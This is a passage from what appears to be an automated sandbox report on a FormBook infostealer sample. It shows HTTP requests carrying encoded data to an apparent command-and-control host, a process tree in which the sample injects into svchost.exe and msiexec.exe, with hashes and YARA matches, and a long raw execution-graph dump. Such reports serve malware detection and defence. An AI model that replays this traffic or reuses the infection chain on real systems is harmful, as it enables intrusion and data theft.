                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h= [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    49 | 192.168.2.5 | 57240 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:28:02.342185974 CEST | 449 | OUT | GET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:28:02.887254953 CEST | 508 | IN | HTTP/1.1 302 Moved Temporarily
                                                    Date: Thu, 05 Sep 2024 12:28:02 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                    X-Powered-By: PHP/5.4.16
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Location: http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ&usid=16&utid=34491565278
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Target ID:0
                                                    Start time:08:23:58
                                                    Start date:05/09/2024
                                                    Path:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\0XLuA614VK.exe"
                                                    Imagebase:0xf20000
                                                    File size:1'296'896 bytes
                                                    MD5 hash:562CB5DCBA0E691BF01AB2C020C0837E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:08:23:59
                                                    Start date:05/09/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\0XLuA614VK.exe"
                                                    Imagebase:0x50000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:08:24:07
                                                    Start date:05/09/2024
                                                    Path:C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe"
                                                    Imagebase:0x50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:08:24:09
                                                    Start date:05/09/2024
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                    Imagebase:0x4b0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:08:24:34
                                                    Start date:05/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff79f9e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:3.4%
                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                      Signature Coverage:3.2%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:54
96374->96368 96379 f2a8c7 22 API calls 96375->96379 96375->96383 96378->96383 96379->96383 96381->96368 96382->96383 96385 f74bdc 96382->96385 96382->96390 96383->96306 96384->96368 96431 f9359c 82 API calls __wsopen_s 96385->96431 96387->96368 96432 f9359c 82 API calls __wsopen_s 96388->96432 96389->96368 96390->96383 96429 f9359c 82 API calls __wsopen_s 96390->96429 96391->96308 96392->96319 96393->96315 96395 f2a8ea __fread_nolock 96394->96395 96396 f2a8db 96394->96396 96395->96316 96396->96395 96397 f3fe0b 22 API calls 96396->96397 96397->96395 96398->96326 96399->96319 96401 f2aedc 96400->96401 96405 f2aed9 __fread_nolock 96400->96405 96402 f3fddb 22 API calls 96401->96402 96403 f2aee7 96402->96403 96404 f3fe0b 22 API calls 96403->96404 96404->96405 96405->96340 96406->96344 96411 f2addd 96407->96411 96408 f2adb6 96408->96295 96409 f3fddb 22 API calls 96409->96411 96410 f2a961 22 API calls 96410->96411 96411->96408 96411->96409 96411->96410 96412 f2a8c7 22 API calls 96411->96412 96413 f2adcd 22 API calls 96411->96413 96412->96411 96413->96411 96417 f30863 messages 96414->96417 96421 f306bd 96414->96421 96415 f30d36 96418 f30847 messages 96415->96418 96436 f3acd5 39 API calls 96415->96436 96417->96415 96417->96418 96420 f75ffd 96417->96420 96425 f3082a messages 96417->96425 96418->96368 96424 f7600f 96420->96424 96435 f4cf65 39 API calls 96420->96435 96421->96415 96421->96417 96421->96418 96423 f3081e 96421->96423 96421->96425 96423->96425 96427 f75e15 96423->96427 96424->96368 96425->96418 96425->96420 96434 f3ce17 22 API calls messages 96425->96434 96433 f4cf65 39 API calls 96427->96433 96428->96368 96429->96383 96430->96383 96431->96388 96432->96383 96433->96427 96434->96425 96435->96424 96436->96418 96437 f2df10 96440 f2b710 96437->96440 96441 f2b72b 96440->96441 96442 f70146 96441->96442 96443 f700f8 96441->96443 96470 f2b750 96441->96470 96482 fa58a2 235 API calls 2 library calls 96442->96482 96446 f70102 96443->96446 96449 f7010f 96443->96449 
96443->96470 96480 fa5d33 235 API calls 96446->96480 96463 f2ba20 96449->96463 96481 fa61d0 235 API calls 2 library calls 96449->96481 96453 f2bbe0 40 API calls 96453->96470 96454 f703d9 96454->96454 96456 f3d336 40 API calls 96456->96470 96458 f2ba4e 96459 f70322 96485 fa5c0c 82 API calls 96459->96485 96463->96458 96486 f9359c 82 API calls __wsopen_s 96463->96486 96467 f2ec40 235 API calls 96467->96470 96468 f2a8c7 22 API calls 96468->96470 96470->96453 96470->96456 96470->96458 96470->96459 96470->96463 96470->96467 96470->96468 96471 f2a81b 41 API calls 96470->96471 96472 f3d2f0 40 API calls 96470->96472 96473 f3a01b 235 API calls 96470->96473 96474 f40242 5 API calls __Init_thread_wait 96470->96474 96475 f3edcd 22 API calls 96470->96475 96476 f400a3 29 API calls __onexit 96470->96476 96477 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96470->96477 96478 f3ee53 82 API calls 96470->96478 96479 f3e5ca 235 API calls 96470->96479 96483 f2aceb 23 API calls messages 96470->96483 96484 f7f6bf 23 API calls 96470->96484 96471->96470 96472->96470 96473->96470 96474->96470 96475->96470 96476->96470 96477->96470 96478->96470 96479->96470 96480->96449 96481->96463 96482->96470 96483->96470 96484->96470 96485->96463 96486->96454 96487 f23156 96490 f23170 96487->96490 96491 f23187 96490->96491 96492 f231eb 96491->96492 96493 f2318c 96491->96493 96531 f231e9 96491->96531 96494 f231f1 96492->96494 96495 f62dfb 96492->96495 96496 f23265 PostQuitMessage 96493->96496 96497 f23199 96493->96497 96499 f231f8 96494->96499 96500 f2321d SetTimer RegisterWindowMessageW 96494->96500 96539 f218e2 10 API calls 96495->96539 96504 f2316a 96496->96504 96502 f231a4 96497->96502 96503 f62e7c 96497->96503 96498 f231d0 DefWindowProcW 96498->96504 96505 f23201 KillTimer 96499->96505 96506 f62d9c 96499->96506 96500->96504 96508 f23246 CreatePopupMenu 96500->96508 96509 f231ae 96502->96509 96510 f62e68 96502->96510 96554 f8bf30 34 API calls ___scrt_fastfail 96503->96554 96535 
f230f2 Shell_NotifyIconW ___scrt_fastfail 96505->96535 96518 f62dd7 MoveWindow 96506->96518 96519 f62da1 96506->96519 96507 f62e1c 96540 f3e499 42 API calls 96507->96540 96508->96504 96515 f62e4d 96509->96515 96516 f231b9 96509->96516 96553 f8c161 27 API calls ___scrt_fastfail 96510->96553 96515->96498 96552 f80ad7 22 API calls 96515->96552 96522 f231c4 96516->96522 96523 f23253 96516->96523 96517 f62e8e 96517->96498 96517->96504 96518->96504 96524 f62dc6 SetFocus 96519->96524 96525 f62da7 96519->96525 96520 f23214 96536 f23c50 DeleteObject DestroyWindow 96520->96536 96521 f23263 96521->96504 96522->96498 96541 f230f2 Shell_NotifyIconW ___scrt_fastfail 96522->96541 96537 f2326f 44 API calls ___scrt_fastfail 96523->96537 96524->96504 96525->96522 96526 f62db0 96525->96526 96538 f218e2 10 API calls 96526->96538 96531->96498 96533 f62e41 96542 f23837 96533->96542 96535->96520 96536->96504 96537->96521 96538->96504 96539->96507 96540->96522 96541->96533 96543 f23862 ___scrt_fastfail 96542->96543 96555 f24212 96543->96555 96547 f63386 Shell_NotifyIconW 96548 f23906 Shell_NotifyIconW 96559 f23923 96548->96559 96550 f238e8 96550->96547 96550->96548 96551 f2391c 96551->96531 96552->96531 96553->96521 96554->96517 96556 f635a4 96555->96556 96557 f238b7 96555->96557 96556->96557 96558 f635ad DestroyIcon 96556->96558 96557->96550 96581 f8c874 42 API calls _strftime 96557->96581 96558->96557 96560 f2393f 96559->96560 96579 f23a13 96559->96579 96582 f26270 96560->96582 96563 f63393 LoadStringW 96566 f633ad 96563->96566 96564 f2395a 96587 f26b57 96564->96587 96572 f2a8c7 22 API calls 96566->96572 96574 f23994 ___scrt_fastfail 96566->96574 96567 f2396f 96568 f2397c 96567->96568 96569 f633c9 96567->96569 96568->96566 96570 f23986 96568->96570 96571 f26350 22 API calls 96569->96571 96599 f26350 96570->96599 96575 f633d7 96571->96575 96572->96574 96577 f239f9 Shell_NotifyIconW 96574->96577 96575->96574 96608 f233c6 96575->96608 96577->96579 96578 f633f9 96580 f233c6 22 API calls 
96578->96580 96579->96551 96580->96574 96581->96550 96583 f3fe0b 22 API calls 96582->96583 96584 f26295 96583->96584 96585 f3fddb 22 API calls 96584->96585 96586 f2394d 96585->96586 96586->96563 96586->96564 96588 f26b67 _wcslen 96587->96588 96589 f64ba1 96587->96589 96592 f26ba2 96588->96592 96593 f26b7d 96588->96593 96618 f293b2 96589->96618 96591 f64baa 96591->96591 96595 f3fddb 22 API calls 96592->96595 96617 f26f34 22 API calls 96593->96617 96597 f26bae 96595->96597 96596 f26b85 __fread_nolock 96596->96567 96598 f3fe0b 22 API calls 96597->96598 96598->96596 96600 f26362 96599->96600 96601 f64a51 96599->96601 96622 f26373 96600->96622 96632 f24a88 22 API calls __fread_nolock 96601->96632 96604 f64a5b 96606 f64a67 96604->96606 96607 f2a8c7 22 API calls 96604->96607 96605 f2636e 96605->96574 96607->96606 96609 f630bb 96608->96609 96610 f233dd 96608->96610 96611 f3fddb 22 API calls 96609->96611 96638 f233ee 96610->96638 96614 f630c5 _wcslen 96611->96614 96613 f233e8 96613->96578 96615 f3fe0b 22 API calls 96614->96615 96616 f630fe __fread_nolock 96615->96616 96617->96596 96619 f293c0 96618->96619 96621 f293c9 __fread_nolock 96618->96621 96620 f2aec9 22 API calls 96619->96620 96619->96621 96620->96621 96621->96591 96624 f26382 96622->96624 96629 f263b6 __fread_nolock 96622->96629 96623 f64a82 96626 f3fddb 22 API calls 96623->96626 96624->96623 96625 f263a9 96624->96625 96624->96629 96633 f2a587 96625->96633 96628 f64a91 96626->96628 96630 f3fe0b 22 API calls 96628->96630 96629->96605 96631 f64ac5 __fread_nolock 96630->96631 96632->96604 96634 f2a59d 96633->96634 96637 f2a598 __fread_nolock 96633->96637 96635 f3fe0b 22 API calls 96634->96635 96636 f6f80f 96634->96636 96635->96637 96637->96629 96639 f233fe _wcslen 96638->96639 96640 f23411 96639->96640 96641 f6311d 96639->96641 96642 f2a587 22 API calls 96640->96642 96643 f3fddb 22 API calls 96641->96643 96644 f2341e __fread_nolock 96642->96644 96645 f63127 96643->96645 96644->96613 96646 f3fe0b 22 API calls 
96645->96646 96647 f63157 __fread_nolock 96646->96647 96648 f22e37 96649 f2a961 22 API calls 96648->96649 96650 f22e4d 96649->96650 96727 f24ae3 96650->96727 96652 f22e6b 96741 f23a5a 96652->96741 96654 f22e7f 96748 f29cb3 96654->96748 96659 f62cb0 96792 f92cf9 96659->96792 96660 f22ead 96663 f2a8c7 22 API calls 96660->96663 96662 f62cc3 96664 f62ccf 96662->96664 96818 f24f39 96662->96818 96665 f22ec3 96663->96665 96668 f24f39 68 API calls 96664->96668 96776 f26f88 22 API calls 96665->96776 96670 f62ce5 96668->96670 96669 f22ecf 96671 f29cb3 22 API calls 96669->96671 96824 f23084 22 API calls 96670->96824 96672 f22edc 96671->96672 96777 f2a81b 41 API calls 96672->96777 96675 f22eec 96677 f29cb3 22 API calls 96675->96677 96676 f62d02 96825 f23084 22 API calls 96676->96825 96679 f22f12 96677->96679 96778 f2a81b 41 API calls 96679->96778 96680 f62d1e 96682 f23a5a 24 API calls 96680->96682 96684 f62d44 96682->96684 96683 f22f21 96687 f2a961 22 API calls 96683->96687 96826 f23084 22 API calls 96684->96826 96686 f62d50 96688 f2a8c7 22 API calls 96686->96688 96689 f22f3f 96687->96689 96690 f62d5e 96688->96690 96779 f23084 22 API calls 96689->96779 96827 f23084 22 API calls 96690->96827 96693 f22f4b 96780 f44a28 40 API calls 3 library calls 96693->96780 96694 f62d6d 96698 f2a8c7 22 API calls 96694->96698 96696 f22f59 96696->96670 96697 f22f63 96696->96697 96781 f44a28 40 API calls 3 library calls 96697->96781 96700 f62d83 96698->96700 96828 f23084 22 API calls 96700->96828 96701 f22f6e 96701->96676 96703 f22f78 96701->96703 96782 f44a28 40 API calls 3 library calls 96703->96782 96704 f62d90 96706 f22f83 96706->96680 96707 f22f8d 96706->96707 96783 f44a28 40 API calls 3 library calls 96707->96783 96709 f22f98 96710 f22fdc 96709->96710 96784 f23084 22 API calls 96709->96784 96710->96694 96711 f22fe8 96710->96711 96711->96704 96786 f263eb 22 API calls 96711->96786 96713 f22fbf 96716 f2a8c7 22 API calls 96713->96716 96715 f22ff8 96787 f26a50 22 API calls 96715->96787 96718 
f22fcd 96716->96718 96785 f23084 22 API calls 96718->96785 96719 f23006 96788 f270b0 23 API calls 96719->96788 96724 f23021 96725 f23065 96724->96725 96789 f26f88 22 API calls 96724->96789 96790 f270b0 23 API calls 96724->96790 96791 f23084 22 API calls 96724->96791 96728 f24af0 __wsopen_s 96727->96728 96729 f26b57 22 API calls 96728->96729 96730 f24b22 96728->96730 96729->96730 96736 f24b58 96730->96736 96829 f24c6d 96730->96829 96732 f24c29 96733 f29cb3 22 API calls 96732->96733 96740 f24c5e 96732->96740 96735 f24c52 96733->96735 96734 f29cb3 22 API calls 96734->96736 96737 f2515f 22 API calls 96735->96737 96736->96732 96736->96734 96738 f24c6d 22 API calls 96736->96738 96832 f2515f 96736->96832 96737->96740 96738->96736 96740->96652 96838 f61f50 96741->96838 96744 f29cb3 22 API calls 96745 f23a8d 96744->96745 96840 f23aa2 96745->96840 96747 f23a97 96747->96654 96749 f29cc2 _wcslen 96748->96749 96750 f3fe0b 22 API calls 96749->96750 96751 f29cea __fread_nolock 96750->96751 96752 f3fddb 22 API calls 96751->96752 96753 f22e8c 96752->96753 96754 f24ecb 96753->96754 96860 f24e90 LoadLibraryA 96754->96860 96759 f24ef6 LoadLibraryExW 96868 f24e59 LoadLibraryA 96759->96868 96760 f63ccf 96761 f24f39 68 API calls 96760->96761 96764 f63cd6 96761->96764 96766 f24e59 3 API calls 96764->96766 96768 f63cde 96766->96768 96767 f24f20 96767->96768 96769 f24f2c 96767->96769 96890 f250f5 96768->96890 96770 f24f39 68 API calls 96769->96770 96772 f22ea5 96770->96772 96772->96659 96772->96660 96775 f63d05 96776->96669 96777->96675 96778->96683 96779->96693 96780->96696 96781->96701 96782->96706 96783->96709 96784->96713 96785->96710 96786->96715 96787->96719 96788->96724 96789->96724 96790->96724 96791->96724 96793 f92d15 96792->96793 96794 f2511f 64 API calls 96793->96794 96795 f92d29 96794->96795 97161 f92e66 96795->97161 96798 f250f5 40 API calls 96799 f92d56 96798->96799 96800 f250f5 40 API calls 96799->96800 96801 f92d66 96800->96801 96802 f250f5 40 API calls 96801->96802 96803 
f92d81 96802->96803 96804 f250f5 40 API calls 96803->96804 96805 f92d9c 96804->96805 96806 f2511f 64 API calls 96805->96806 96807 f92db3 96806->96807 96808 f4ea0c ___std_exception_copy 21 API calls 96807->96808 96809 f92dba 96808->96809 96810 f4ea0c ___std_exception_copy 21 API calls 96809->96810 96811 f92dc4 96810->96811 96812 f250f5 40 API calls 96811->96812 96813 f92dd8 96812->96813 96814 f928fe 27 API calls 96813->96814 96816 f92dee 96814->96816 96815 f92d3f 96815->96662 96816->96815 97167 f922ce 96816->97167 96819 f24f43 96818->96819 96820 f24f4a 96818->96820 96821 f4e678 67 API calls 96819->96821 96822 f24f6a FreeLibrary 96820->96822 96823 f24f59 96820->96823 96821->96820 96822->96823 96823->96664 96824->96676 96825->96680 96826->96686 96827->96694 96828->96704 96830 f2aec9 22 API calls 96829->96830 96831 f24c78 96830->96831 96831->96730 96833 f2516e 96832->96833 96837 f2518f __fread_nolock 96832->96837 96835 f3fe0b 22 API calls 96833->96835 96834 f3fddb 22 API calls 96836 f251a2 96834->96836 96835->96837 96836->96736 96837->96834 96839 f23a67 GetModuleFileNameW 96838->96839 96839->96744 96841 f61f50 __wsopen_s 96840->96841 96842 f23aaf GetFullPathNameW 96841->96842 96843 f23ae9 96842->96843 96844 f23ace 96842->96844 96854 f2a6c3 96843->96854 96846 f26b57 22 API calls 96844->96846 96847 f23ada 96846->96847 96850 f237a0 96847->96850 96851 f237ae 96850->96851 96852 f293b2 22 API calls 96851->96852 96853 f237c2 96852->96853 96853->96747 96855 f2a6d0 96854->96855 96856 f2a6dd 96854->96856 96855->96847 96857 f3fddb 22 API calls 96856->96857 96858 f2a6e7 96857->96858 96859 f3fe0b 22 API calls 96858->96859 96859->96855 96861 f24ec6 96860->96861 96862 f24ea8 GetProcAddress 96860->96862 96865 f4e5eb 96861->96865 96863 f24eb8 96862->96863 96863->96861 96864 f24ebf FreeLibrary 96863->96864 96864->96861 96898 f4e52a 96865->96898 96867 f24eea 96867->96759 96867->96760 96869 f24e6e GetProcAddress 96868->96869 96870 f24e8d 96868->96870 96871 f24e7e 96869->96871 96873 f24f80 
96870->96873 96871->96870 96872 f24e86 FreeLibrary 96871->96872 96872->96870 96874 f3fe0b 22 API calls 96873->96874 96875 f24f95 96874->96875 96966 f25722 96875->96966 96877 f24fa1 __fread_nolock 96878 f250a5 96877->96878 96879 f63d1d 96877->96879 96889 f24fdc 96877->96889 96969 f242a2 CreateStreamOnHGlobal 96878->96969 96980 f9304d 74 API calls 96879->96980 96882 f250f5 40 API calls 96882->96889 96883 f63d22 96884 f2511f 64 API calls 96883->96884 96885 f63d45 96884->96885 96886 f250f5 40 API calls 96885->96886 96888 f2506e messages 96886->96888 96888->96767 96889->96882 96889->96883 96889->96888 96975 f2511f 96889->96975 96891 f25107 96890->96891 96892 f63d70 96890->96892 97002 f4e8c4 96891->97002 96895 f928fe 97144 f9274e 96895->97144 96897 f92919 96897->96775 96901 f4e536 ___scrt_is_nonwritable_in_current_image 96898->96901 96899 f4e544 96923 f4f2d9 20 API calls _abort 96899->96923 96901->96899 96903 f4e574 96901->96903 96902 f4e549 96924 f527ec 26 API calls _abort 96902->96924 96905 f4e586 96903->96905 96906 f4e579 96903->96906 96915 f58061 96905->96915 96925 f4f2d9 20 API calls _abort 96906->96925 96909 f4e58f 96910 f4e595 96909->96910 96911 f4e5a2 96909->96911 96926 f4f2d9 20 API calls _abort 96910->96926 96927 f4e5d4 LeaveCriticalSection __fread_nolock 96911->96927 96914 f4e554 __fread_nolock 96914->96867 96916 f5806d ___scrt_is_nonwritable_in_current_image 96915->96916 96928 f52f5e EnterCriticalSection 96916->96928 96918 f5807b 96929 f580fb 96918->96929 96922 f580ac __fread_nolock 96922->96909 96923->96902 96924->96914 96925->96914 96926->96914 96927->96914 96928->96918 96935 f5811e 96929->96935 96930 f58088 96942 f580b7 96930->96942 96931 f58177 96947 f54c7d 96931->96947 96935->96930 96935->96931 96945 f4918d EnterCriticalSection 96935->96945 96946 f491a1 LeaveCriticalSection 96935->96946 96937 f58189 96937->96930 96960 f53405 11 API calls 2 library calls 96937->96960 96939 f581a8 96961 f4918d EnterCriticalSection 96939->96961 96965 f52fa6 
LeaveCriticalSection 96942->96965 96944 f580be 96944->96922 96945->96935 96946->96935 96952 f54c8a _abort 96947->96952 96948 f54cca 96963 f4f2d9 20 API calls _abort 96948->96963 96949 f54cb5 RtlAllocateHeap 96951 f54cc8 96949->96951 96949->96952 96954 f529c8 96951->96954 96952->96948 96952->96949 96962 f44ead 7 API calls 2 library calls 96952->96962 96955 f529d3 RtlFreeHeap 96954->96955 96959 f529fc _free 96954->96959 96956 f529e8 96955->96956 96955->96959 96964 f4f2d9 20 API calls _abort 96956->96964 96958 f529ee GetLastError 96958->96959 96959->96937 96960->96939 96961->96930 96962->96952 96963->96951 96964->96958 96965->96944 96967 f3fddb 22 API calls 96966->96967 96968 f25734 96967->96968 96968->96877 96970 f242bc FindResourceExW 96969->96970 96974 f242d9 96969->96974 96971 f635ba LoadResource 96970->96971 96970->96974 96972 f635cf SizeofResource 96971->96972 96971->96974 96973 f635e3 LockResource 96972->96973 96972->96974 96973->96974 96974->96889 96976 f63d90 96975->96976 96977 f2512e 96975->96977 96981 f4ece3 96977->96981 96980->96883 96984 f4eaaa 96981->96984 96983 f2513c 96983->96889 96987 f4eab6 ___scrt_is_nonwritable_in_current_image 96984->96987 96985 f4eac2 96997 f4f2d9 20 API calls _abort 96985->96997 96987->96985 96988 f4eae8 96987->96988 96999 f4918d EnterCriticalSection 96988->96999 96989 f4eac7 96998 f527ec 26 API calls _abort 96989->96998 96992 f4eaf4 97000 f4ec0a 62 API calls 2 library calls 96992->97000 96994 f4eb08 97001 f4eb27 LeaveCriticalSection __fread_nolock 96994->97001 96996 f4ead2 __fread_nolock 96996->96983 96997->96989 96998->96996 96999->96992 97000->96994 97001->96996 97005 f4e8e1 97002->97005 97004 f25118 97004->96895 97006 f4e8ed ___scrt_is_nonwritable_in_current_image 97005->97006 97007 f4e900 ___scrt_fastfail 97006->97007 97008 f4e92d 97006->97008 97009 f4e925 __fread_nolock 97006->97009 97032 f4f2d9 20 API calls _abort 97007->97032 97018 f4918d EnterCriticalSection 97008->97018 97009->97004 97011 f4e937 97019 f4e6f8 
97011->97019 97014 f4e91a 97033 f527ec 26 API calls _abort 97014->97033 97018->97011 97022 f4e70a ___scrt_fastfail 97019->97022 97025 f4e727 97019->97025 97020 f4e717 97107 f4f2d9 20 API calls _abort 97020->97107 97022->97020 97022->97025 97027 f4e76a __fread_nolock 97022->97027 97023 f4e71c 97108 f527ec 26 API calls _abort 97023->97108 97034 f4e96c LeaveCriticalSection __fread_nolock 97025->97034 97026 f4e886 ___scrt_fastfail 97110 f4f2d9 20 API calls _abort 97026->97110 97027->97025 97027->97026 97035 f4d955 97027->97035 97042 f58d45 97027->97042 97109 f4cf78 26 API calls 4 library calls 97027->97109 97032->97014 97033->97009 97034->97009 97036 f4d976 97035->97036 97037 f4d961 97035->97037 97036->97027 97111 f4f2d9 20 API calls _abort 97037->97111 97039 f4d966 97112 f527ec 26 API calls _abort 97039->97112 97041 f4d971 97041->97027 97043 f58d57 97042->97043 97044 f58d6f 97042->97044 97122 f4f2c6 20 API calls _abort 97043->97122 97046 f590d9 97044->97046 97051 f58db4 97044->97051 97138 f4f2c6 20 API calls _abort 97046->97138 97047 f58d5c 97123 f4f2d9 20 API calls _abort 97047->97123 97050 f590de 97139 f4f2d9 20 API calls _abort 97050->97139 97052 f58dbf 97051->97052 97055 f58d64 97051->97055 97059 f58def 97051->97059 97124 f4f2c6 20 API calls _abort 97052->97124 97055->97027 97056 f58dcc 97140 f527ec 26 API calls _abort 97056->97140 97057 f58dc4 97125 f4f2d9 20 API calls _abort 97057->97125 97061 f58e08 97059->97061 97062 f58e2e 97059->97062 97063 f58e4a 97059->97063 97061->97062 97069 f58e15 97061->97069 97126 f4f2c6 20 API calls _abort 97062->97126 97129 f53820 21 API calls 2 library calls 97063->97129 97066 f58e33 97127 f4f2d9 20 API calls _abort 97066->97127 97113 f5f89b 97069->97113 97070 f58e61 97073 f529c8 _free 20 API calls 97070->97073 97071 f58fb3 97074 f59029 97071->97074 97078 f58fcc GetConsoleMode 97071->97078 97072 f58e3a 97128 f527ec 26 API calls _abort 97072->97128 97076 f58e6a 97073->97076 97077 f5902d ReadFile 97074->97077 97079 f529c8 _free 20 
